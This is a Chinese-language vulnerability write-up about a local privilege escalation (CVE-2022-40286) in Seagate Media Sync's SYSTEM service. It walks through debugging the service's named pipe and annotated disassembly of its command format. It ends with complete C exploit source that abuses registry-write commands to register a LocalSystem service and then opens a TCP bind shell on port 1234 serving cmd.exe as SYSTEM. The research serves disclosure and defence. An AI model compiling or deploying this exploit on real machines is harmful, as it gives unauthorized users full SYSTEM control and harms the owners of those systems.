我发现的第一个软件包称为“Seagate Media Sync”,这是一个将媒体文件复制到无线希捷硬盘的工具。我安装了产品,正如预期的那样,这创建了一个名为MediaAggreService.exe的后台SYSTEM服务:
该工具还安装了一个 UI 程序,该程序与交互式用户在同一会话中运行:
特权提升的常见攻击向量始于低特权进程 (UI) 和高特权服务(或驱动程序)之间的内部通信。调查此问题的第一步是从我们可以监控的 UI 中触发合法通信。不幸的是,UI 程序仅提供非常有限的功能,因为我没有相应的 Seagate 硬件:
Process Explorer 显示该服务包含名为MEDIA_AGGRE_PIPE.PIP的命名管道的句柄- 我怀疑该管道用于通信UI ( stxmediamanager.exe ) 和服务 ( MediaAggreService.exe )。
回顾 UI,我们可以单击的唯一按钮似乎是“刷新”——希望这会触发一些与我们可以监控的服务的通信。我们可以将调试器附加到 UI 进程并在CreateFile和WriteFile函数上设置断点以确认这一理论:
如上所示,当单击“刷新”时,UI 进程使用CreateFile打开到命名管道的连接。我们可以通过检查对WriteFile的后续调用来记录消息数据的内容。
有根据的猜测告诉我,第一条消息是一个 4 字节长度的字段,表示消息正文的大小。第二条消息包含实际的命令数据。在此示例中,它正在发送一条消息正文长度为 8 字节的命令 – 初始 4 字节长度值与预期的第二个WriteFile调用的nNumberOfBytesToWrite参数匹配。我们现在可以检查服务进程中的接收端。在MediaAggreService.exe中的ConnectNamedPipe函数上设置断点应该在 UI 客户端调用CreateFile时触发: 我们现在可以在ReadFile上设置断点
现在我们已经在服务中找到了读取命令数据的代码,我们可以按照执行流程查看接下来会发生什么。由于我们只能访问 UI 中的单个“刷新”命令,因此需要进行一些静态分析以查看可用的其他命令。
在花了一些时间分析代码之后,我可以看到每个命令都以 16 位签名 ( 0x4B5C ) 开头。其后是 16 位“主要”命令 ID,然后是 32 位“次要”命令 ID。每个“主要”命令 ID 都朝着不同的 switch 语句前进——我在下面评论了反汇编:
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001145BB | BA 5C4B0000 | mov edx,4B5C | set expected command header signature: 0x4B5C 001145C0 | 0FB708 | movzx ecx,word ptr ds:[eax] | get actual command header signature value 001145C3 | 66:3BCA | cmp cx,dx | check 16-bit signature value 001145C6 | 74 1A | je mediaaggreservice.1145E2 | jump if signature matches 001145C8 | 51 | push ecx | 001145C9 | 68 D8391200 | push mediaaggreservice.1239D8 | "[PIPE] Failure: Bad Signature 0x%X" 001145CE | 68 F0841400 | push mediaaggreservice.1484F0 | 001145D3 | E8 D866FFFF | call mediaaggreservice.10ACB0 | add_log_entry 001145D8 | 83C4 0C | add esp,C | 001145DB | 33C0 | xor eax,eax | 001145DD | 5E | pop esi | 001145DE | 8BE5 | mov esp,ebp | 001145E0 | 5D | pop ebp | 001145E1 | C3 | ret | error, return 001145E2 | 57 | push edi | 001145E3 | FF70 04 | push dword ptr ds:[eax+4] | log minor command ID (32-bit) 001145E6 | 0FB740 02 | movzx eax,word ptr ds:[eax+2] | log major command ID (16-bit) 001145EA | 50 | push eax | 001145EB | 68 203A1200 | push mediaaggreservice.123A20 | "[PIPE] Command major/minor: [0x%X:0x%X]" 001145F0 | 68 F0841400 | push mediaaggreservice.1484F0 | 001145F5 | E8 7667FFFF | call mediaaggreservice.10AD70 | add_log_entry 001145FA | 8B86 D0F00100 | mov eax,dword ptr ds:[esi+1F0D0] | 00114600 | C745 F8 00000000 | mov dword ptr ss:[ebp-8],0 | 00114607 | 0FB740 02 | movzx eax,word ptr ds:[eax+2] | get major command value (message_base + 0x2) 0011460B | 83C4 10 | add esp,10 | 0011460E | 83F8 10 | cmp eax,10 | check if the major command value is 0x10 00114611 | 74 60 | je mediaaggreservice.114673 | jump to 0x10 command switch 00114613 | 83F8 20 | cmp eax,20 | check if the major command value is 0x20 00114616 | 74 1A | je mediaaggreservice.114632 | jump to 0x20 command switch 00114618 | 68 C83A1200 | push mediaaggreservice.123AC8 | "[PIPE] Failure: Unknown Major Command" 0011461D | 68 F0841400 | push mediaaggreservice.1484F0 | 00114622 | E8 8966FFFF | call mediaaggreservice.10ACB0 | add_log_entry |
如上所示,该服务似乎只支持 2 个“主要”命令 ID – 0x10和0x20。考虑到这些信息,我们现在可以解码我们之前记录的原始“刷新”命令:
1 2 3 4 5 6 |
Header Length: 0x8 0x0000 -> Signature (0x4B5C) 0x0002 -> Major Command ID (0x10) 0x0004 -> Minor Command ID (0x1) (no message body) |
在快速查看两个主要命令组的代码后,我注意到0x10命令组包含一个调用名为MXOSRVSetRegKey的内部函数的条目。该条目的“次要”命令 ID 为0x400。
1 2 3 4 5 6 7 8 9 10 11 12 13 |
001136E4 | 68 08300000 | push 3008 | total message length 001136E9 | 8D47 08 | lea eax,dword ptr ds:[edi+8] | 001136EC | 50 | push eax | 001136ED | 8DB3 C0A90100 | lea esi,dword ptr ds:[ebx+1A9C0] | 001136F3 | 56 | push esi | 001136F4 | E8 5F560000 | call <JMP.&memcpy> | copy command message body 001136F9 | FFB3 C0D90100 | push dword ptr ds:[ebx+1D9C0] | 001136FF | 8D83 C0C90100 | lea eax,dword ptr ds:[ebx+1C9C0] | 00113705 | 50 | push eax | 00113706 | 8D83 C0B90100 | lea eax,dword ptr ds:[ebx+1B9C0] | 0011370C | 50 | push eax | 0011370D | 56 | push esi | 0011370E | FF15 68D31100 | call dword ptr ds:[<&?MXOSRVSetRegKey@@YAHPA_W00H@Z>] | execute command |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
70F25590 | 55 | push ebp | 70F25591 | 8BEC | mov ebp,esp | 70F25593 | 83EC 08 | sub esp,8 | 70F25596 | 8D45 F8 | lea eax,dword ptr ss:[ebp-8] | 70F25599 | 50 | push eax | 70F2559A | 8D45 FC | lea eax,dword ptr ss:[ebp-4] | 70F2559D | 50 | push eax | 70F2559E | 6A 00 | push 0 | 70F255A0 | 68 3F000F00 | push F003F | 70F255A5 | 6A 00 | push 0 | 70F255A7 | 68 6823F370 | push stxmediadevif.70F32368 | 70F255AC | 6A 00 | push 0 | 70F255AE | FF75 08 | push dword ptr ss:[ebp+8] | 70F255B1 | C745 FC 00000000 | mov dword ptr ss:[ebp-4],0 | 70F255B8 | 68 02000080 | push 80000002 | 70F255BD | FF15 1020F370 | call dword ptr ds:[<&RegCreateKeyExW>] | 70F255C3 | 85C0 | test eax,eax | 70F255C5 | 75 1E | jne stxmediadevif.70F255E5 | 70F255C7 | FF75 14 | push dword ptr ss:[ebp+14] | 70F255CA | FF75 10 | push dword ptr ss:[ebp+10] | 70F255CD | 6A 01 | push 1 | 70F255CF | 50 | push eax | 70F255D0 | FF75 0C | push dword ptr ss:[ebp+C] | 70F255D3 | FF75 FC | push dword ptr ss:[ebp-4] | 70F255D6 | FF15 0420F370 | call dword ptr ds:[<&RegSetValueExW>] | 70F255DC | FF75 FC | push dword ptr ss:[ebp-4] | 70F255DF | FF15 0020F370 | call dword ptr ds:[<&RegCloseKey>] | 70F255E5 | 33C0 | xor eax,eax | 70F255E7 | 8BE5 | mov esp,ebp | 70F255E9 | 5D | pop ebp | 70F255EA | C3 | ret | |
对该代码的初步分析表明,该命令可能允许我们通过客户端进程远程创建/修改注册表字符串值。基本密钥似乎被硬编码为HKEY_LOCAL_MACHINE(在RegCreateKeyExW调用中推送 0x80000002 )。对这些函数进行逆向工程后,我可以看到该命令期望接收以下格式的消息数据:
1 2 3 4 5 6 7 8 9 10 11 |
Header Length: 0x8 0x0000 -> Signature (0x4B5C) 0x0002 -> Major Command ID (0x10) 0x0004 -> Minor Command ID (0x400) Message Length: 0x3008 0x0000 -> Registry Key Path (wide-char) 0x1000 -> Value Name (wide-char) 0x2000 -> Value (wide-char) 0x3000 -> Value Length (DWORD) 0x3004 -> (Unused) |
上面的命令只支持字符串值——类型字段被硬编码为REG_SZ(在RegSetValueExW调用中按 1 )。 我还发现了另一个命令 ID ( 0x410 ),它允许我们以相同的方式设置REG_DWORD值。此命令接收以下格式的消息数据:
1 2 3 4 5 6 7 8 9 10 11 12 |
Header Length: 0x8 0x0000 -> Signature (0x4B5C) 0x0002 -> Major Command ID (0x10) 0x0004 -> Minor Command ID (0x410) Message Length: 0x3008 0x0000 -> Registry Key Path (wide-char) 0x1000 -> Value Name (wide-char) 0x2000 -> (Unused) 0x3000 -> (Unused) 0x3004 -> Value (DWORD) |
从上面命令数据的布局我们可以看出,我们可以推断这两个命令共享一个共同的数据结构。我们可以用 C 结构来表示它们,如下所示:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
// reverse-engineered seagate command header struct SeagateCommandHeaderStruct { WORD wSignature; WORD wMajorCommandID; DWORD dwMinorCommandID; }; // reverse-engineered seagate registry command data struct SeagateRegistryCommandDataStruct { wchar_t wszKeyPath[2048]; wchar_t wszValueName[2048]; wchar_t wszValueString[2048]; DWORD dwValueStringLength; DWORD dwDwordValue; }; |
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DWORD SendSeagateCommand(WORD wMajorCommandID, DWORD dwMinorCommandID, BYTE *pCommandData, DWORD dwCommandDataLength) { HANDLE hPipe = NULL; DWORD dwBytesWritten = 0; DWORD dwDataLength = 0; SeagateCommandHeaderStruct SeagateCommandHeader; BYTE *pDataBlock = NULL; // open seagate media sync pipe hPipe = CreateFile("\\\\.\\pipe\\MEDIA_AGGRE_PIPE.PIP", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if(hPipe == INVALID_HANDLE_VALUE) { return 1; } // initialise command header memset((void*)&SeagateCommandHeader, 0, sizeof(SeagateCommandHeader)); SeagateCommandHeader.wSignature = 0x4B5C; SeagateCommandHeader.wMajorCommandID = wMajorCommandID; SeagateCommandHeader.dwMinorCommandID = dwMinorCommandID; // calculate total data length dwDataLength = sizeof(SeagateCommandHeader) + dwCommandDataLength; // write data length to pipe if(WriteFile(hPipe, (void*)&dwDataLength, sizeof(dwDataLength), &dwBytesWritten, NULL) == 0) { CloseHandle(hPipe); return 1; } // allocate buffer to combine the command header and data pDataBlock = (BYTE*)malloc(dwDataLength); if(pDataBlock == NULL) { return 1; } // copy the header and data into the data buffer memcpy((void*)pDataBlock, (void*)&SeagateCommandHeader, sizeof(SeagateCommandHeader)); memcpy((void*)((BYTE*)pDataBlock + sizeof(SeagateCommandHeader)), (void*)pCommandData, dwCommandDataLength); // write the message to the pipe if(WriteFile(hPipe, (void*)pDataBlock, dwDataLength, &dwBytesWritten, NULL) == 0) { free(pDataBlock); CloseHandle(hPipe); return 1; } // free buffer free(pDataBlock); // close pipe CloseHandle(hPipe); return 0; } DWORD SetRegString(char *pKeyPath, char *pValueName, char *pValue) { SeagateRegistryCommandDataStruct SeagateRegistryCommandData; // initialise seagate registry command data (string) memset((void*)&SeagateRegistryCommandData, 0, sizeof(SeagateRegistryCommandData)); mbstowcs(SeagateRegistryCommandData.wszKeyPath, pKeyPath, (sizeof(SeagateRegistryCommandData.wszKeyPath) / sizeof(wchar_t)) - 1); mbstowcs(SeagateRegistryCommandData.wszValueName, pValueName, (sizeof(SeagateRegistryCommandData.wszValueName) / sizeof(wchar_t)) - 1); mbstowcs(SeagateRegistryCommandData.wszValueString, pValue, (sizeof(SeagateRegistryCommandData.wszValueString) / sizeof(wchar_t)) - 1); SeagateRegistryCommandData.dwValueStringLength = (wcslen(SeagateRegistryCommandData.wszValueString) + 1) * sizeof(wchar_t); // send command if(SendSeagateCommand(0x10, 0x400, (BYTE*)&SeagateRegistryCommandData, sizeof(SeagateRegistryCommandData)) != 0) { return 1; } return 0; } SetRegString("SOFTWARE\\Microsoft\\x86matthew", "x86matthew", "test_value"); |
上面的代码连接到MEDIA_AGGRE_PIPE.PIP管道并尝试在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\x86matthew中创建一个注册表值- 我们将作为普通用户执行这个程序:
正如我们在上面看到的,这段代码正常工作并创建了目标注册表值。具有写入HKEY_LOCAL_MACHINE的能力为利用提供了很多可能性 – 在这种情况下,我们将通过向HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注册表项添加一个条目来创建自定义服务。
而不是部署单独的 exe 以用作SYSTEM服务负载,我们将把这个功能结合到主要的漏洞利用可执行文件中。exe 将首先检查它是否以SYSTEM用户身份运行 – 如果不是,它将执行默认行为并尝试通过 Seagate 管道创建新服务,如上所述。否则,如果 exe 检测到它作为SYSTEM服务运行,它将部署主要有效负载 – 这将创建一个 TCP 绑定外壳用于演示目的。
2.使用GetModuleFileName 获取当前exe的文件路径.
3. 通过将逆向工程的注册表命令发送到希捷命名管道来创建新的 Windows 服务。使用当前 exe 作为进程路径,将新条目添加到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services 。
4. 重新启动计算机。
5. Windows 将在启动时自动启动我们新创建的“服务”。漏洞利用可执行文件将检测到它以SYSTEM身份运行并侦听端口 1234 上的 TCP 连接。
6. 当用户连接到localhost:1234时,漏洞利用服务将以SYSTEM身份启动新的cmd.exe进程,并重定向 stdin/stdout到客户端套接字。
演示 执行漏洞利用:
作为参考,此漏洞已分配给 CVE-2022-40286。
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#include <stdio.h> #include <winsock2.h> #include <windows.h> #pragma comment(lib, "ws2_32.lib") // reverse-engineered seagate command header struct SeagateCommandHeaderStruct { WORD wSignature; WORD wMajorCommandID; DWORD dwMinorCommandID; }; // reverse-engineered seagate registry command data struct SeagateRegistryCommandDataStruct { wchar_t wszKeyPath[2048]; wchar_t wszValueName[2048]; wchar_t wszValueString[2048]; DWORD dwValueStringLength; DWORD dwDwordValue; }; DWORD SendSeagateCommand(WORD wMajorCommandID, DWORD dwMinorCommandID, BYTE *pCommandData, DWORD dwCommandDataLength) { HANDLE hPipe = NULL; DWORD dwBytesWritten = 0; DWORD dwDataLength = 0; SeagateCommandHeaderStruct SeagateCommandHeader; BYTE *pDataBlock = NULL; // open seagate media sync pipe hPipe = CreateFile("\\\\.\\pipe\\MEDIA_AGGRE_PIPE.PIP", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if(hPipe == INVALID_HANDLE_VALUE) { return 1; } // initialise command header memset((void*)&SeagateCommandHeader, 0, sizeof(SeagateCommandHeader)); SeagateCommandHeader.wSignature = 0x4B5C; SeagateCommandHeader.wMajorCommandID = wMajorCommandID; SeagateCommandHeader.dwMinorCommandID = dwMinorCommandID; // calculate total data length dwDataLength = sizeof(SeagateCommandHeader) + dwCommandDataLength; // write data length to pipe if(WriteFile(hPipe, (void*)&dwDataLength, sizeof(dwDataLength), &dwBytesWritten, NULL) == 0) { CloseHandle(hPipe); return 1; } // allocate buffer to combine the command header and data pDataBlock = (BYTE*)malloc(dwDataLength); if(pDataBlock == NULL) { return 1; } // copy the header and data into the data buffer memcpy((void*)pDataBlock, (void*)&SeagateCommandHeader, sizeof(SeagateCommandHeader)); memcpy((void*)((BYTE*)pDataBlock + sizeof(SeagateCommandHeader)), (void*)pCommandData, dwCommandDataLength); // write the message to the pipe if(WriteFile(hPipe, (void*)pDataBlock, dwDataLength, &dwBytesWritten, NULL) == 0) { free(pDataBlock); CloseHandle(hPipe); return 1; } // free buffer free(pDataBlock); // close pipe CloseHandle(hPipe); return 0; } DWORD SetRegString(char *pKeyPath, char *pValueName, char *pValue) { SeagateRegistryCommandDataStruct SeagateRegistryCommandData; // initialise seagate registry command data (string) memset((void*)&SeagateRegistryCommandData, 0, sizeof(SeagateRegistryCommandData)); mbstowcs(SeagateRegistryCommandData.wszKeyPath, pKeyPath, (sizeof(SeagateRegistryCommandData.wszKeyPath) / sizeof(wchar_t)) - 1); mbstowcs(SeagateRegistryCommandData.wszValueName, pValueName, (sizeof(SeagateRegistryCommandData.wszValueName) / sizeof(wchar_t)) - 1); mbstowcs(SeagateRegistryCommandData.wszValueString, pValue, (sizeof(SeagateRegistryCommandData.wszValueString) / sizeof(wchar_t)) - 1); SeagateRegistryCommandData.dwValueStringLength = (wcslen(SeagateRegistryCommandData.wszValueString) + 1) * sizeof(wchar_t); // send command if(SendSeagateCommand(0x10, 0x400, (BYTE*)&SeagateRegistryCommandData, sizeof(SeagateRegistryCommandData)) != 0) { return 1; } return 0; } DWORD SetRegDword(char *pKeyPath, char *pValueName, DWORD dwValue) { SeagateRegistryCommandDataStruct SeagateRegistryCommandData; // initialise seagate registry command data (dword) memset((void*)&SeagateRegistryCommandData, 0, sizeof(SeagateRegistryCommandData)); mbstowcs(SeagateRegistryCommandData.wszKeyPath, pKeyPath, (sizeof(SeagateRegistryCommandData.wszKeyPath) / sizeof(wchar_t)) - 1); mbstowcs(SeagateRegistryCommandData.wszValueName, pValueName, (sizeof(SeagateRegistryCommandData.wszValueName) / sizeof(wchar_t)) - 1); SeagateRegistryCommandData.dwDwordValue = dwValue; // send command if(SendSeagateCommand(0x10, 0x410, (BYTE*)&SeagateRegistryCommandData, sizeof(SeagateRegistryCommandData)) != 0) { return 1; } return 0; } DWORD StartBindShell(WORD wPort) { sockaddr_in SockAddr; PROCESS_INFORMATION ProcessInfo; STARTUPINFO StartupInfo; SOCKET ListenSocket = 0; SOCKET AcceptSocket = 0; // create listen socket ListenSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0); if(ListenSocket == INVALID_SOCKET) { return 1; } // set socket addr info memset((void*)&SockAddr, 0, sizeof(SockAddr)); SockAddr.sin_family = AF_INET; SockAddr.sin_port = htons(wPort); SockAddr.sin_addr.s_addr = htonl(INADDR_ANY); // bind socket if(bind(ListenSocket, (sockaddr*)&SockAddr, sizeof(SockAddr)) == SOCKET_ERROR) { closesocket(ListenSocket); return 1; } // listen if(listen(ListenSocket, 1) == SOCKET_ERROR) { closesocket(ListenSocket); return 1; } // wait for clients for(;;) { // wait for connection AcceptSocket = accept(ListenSocket, NULL, NULL); if(AcceptSocket == INVALID_SOCKET) { closesocket(ListenSocket); return 1; } // set StartupInfo fields - redirect input/output to socket memset((void*)&StartupInfo, 0, sizeof(StartupInfo)); StartupInfo.cb = sizeof(StartupInfo); StartupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; StartupInfo.wShowWindow = SW_HIDE; StartupInfo.hStdInput = (HANDLE)AcceptSocket; StartupInfo.hStdOutput = (HANDLE)AcceptSocket; StartupInfo.hStdError = (HANDLE)AcceptSocket; // create cmd.exe process with inherited handles memset((void*)&ProcessInfo, 0, sizeof(ProcessInfo)); if(CreateProcess(NULL, "cmd.exe", NULL, NULL, 1, CREATE_NEW_CONSOLE, NULL, NULL, &StartupInfo, &ProcessInfo) == 0) { closesocket(AcceptSocket); closesocket(ListenSocket); return 1; } // client socket has been passed to cmd.exe - close socket in local process closesocket(AcceptSocket); } // close listen socket closesocket(ListenSocket); return 0; } DWORD ConfirmSystemUser() { HANDLE hToken = NULL; BYTE bTokenUser[1024]; DWORD dwLength = 0; SID_IDENTIFIER_AUTHORITY SidIdentifierAuthority; TOKEN_USER *pTokenUser = NULL; void *pSystemSid = NULL; // open process token if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken) == 0) { return 1; } // get user SID pTokenUser = (TOKEN_USER*)bTokenUser; if(GetTokenInformation(hToken, TokenUser, pTokenUser, sizeof(bTokenUser), &dwLength) == 0) { CloseHandle(hToken); return 1; } // close token handle CloseHandle(hToken); // SECURITY_NT_AUTHORITY SidIdentifierAuthority.Value[0] = 0; SidIdentifierAuthority.Value[1] = 0; SidIdentifierAuthority.Value[2] = 0; SidIdentifierAuthority.Value[3] = 0; SidIdentifierAuthority.Value[4] = 0; SidIdentifierAuthority.Value[5] = 5; // get SYSTEM user SID if(AllocateAndInitializeSid(&SidIdentifierAuthority, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &pSystemSid) == 0) { return 1; } // check if this is the SYSTEM user if(EqualSid(pTokenUser->User.Sid, pSystemSid) == 0) { FreeSid(pSystemSid); return 1; } // clean up FreeSid(pSystemSid); return 0; } DWORD CreateServiceViaSeagate(char *pServiceName, char *pExePath) { char szServiceKey[512]; char szImagePath[512]; char szWindowsDir[512]; // get windows directory memset(szWindowsDir, 0, sizeof(szWindowsDir)); GetWindowsDirectory(szWindowsDir, sizeof(szWindowsDir) - 1); // set service key memset(szServiceKey, 0, sizeof(szServiceKey)); _snprintf(szServiceKey, sizeof(szServiceKey) - 1, "SYSTEM\\CurrentControlSet\\Services\\%s", pServiceName); // set image path // (cmd.exe will launch this process in the background - this is to prevent the service manager from killing our process for not responding to service status requests) memset(szImagePath, 0, sizeof(szImagePath)); _snprintf(szImagePath, sizeof(szImagePath) - 1, "\"%s\\system32\\cmd.exe\" /c start \"\" \"%s\"", szWindowsDir, pExePath); // set registry value if(SetRegString(szServiceKey, "ImagePath", szImagePath) != 0) { return 1; } // set registry value if(SetRegString(szServiceKey, "ObjectName", "LocalSystem") != 0) { return 1; } // set registry value if(SetRegDword(szServiceKey, "ErrorControl", 1) != 0) { return 1; } // set registry value if(SetRegDword(szServiceKey, "Start", 2) != 0) { return 1; } // set registry value if(SetRegDword(szServiceKey, "Type", 16) != 0) { return 1; } return 0; } int main() { WSADATA WinsockData; char szPath[512]; // check if this process is running as SYSTEM user if(ConfirmSystemUser() == 0) { // initialise winsock if(WSAStartup(MAKEWORD(2, 2), &WinsockData) != 0) { return 1; } // ready - start tcp bind shell on port 1234 if(StartBindShell(1234) != 0) { return 1; } } else { printf("Seagate Media Sync (Version 2.01.0414) - Windows Local Privilege Escalation Exploit (CVE-2022-40286)\n"); printf("x86matthew (www.x86matthew.com)\n\n"); printf("Retrieving current exe path...\n"); // get current exe path memset(szPath, 0, sizeof(szPath)); if(GetModuleFileName(NULL, szPath, sizeof(szPath) - 1) == 0) { printf("Error: Failed to get current exe path\n"); return 1; } printf("Creating service...\n"); // create service if(CreateServiceViaSeagate("x86matthew_seagate_svc", szPath) != 0) { printf("Error: Failed to add service via Seagate Media Sync service\n"); return 1; } printf("Service created successfully - reboot and connect to localhost:1234 for SYSTEM shell\n"); } return 0; } |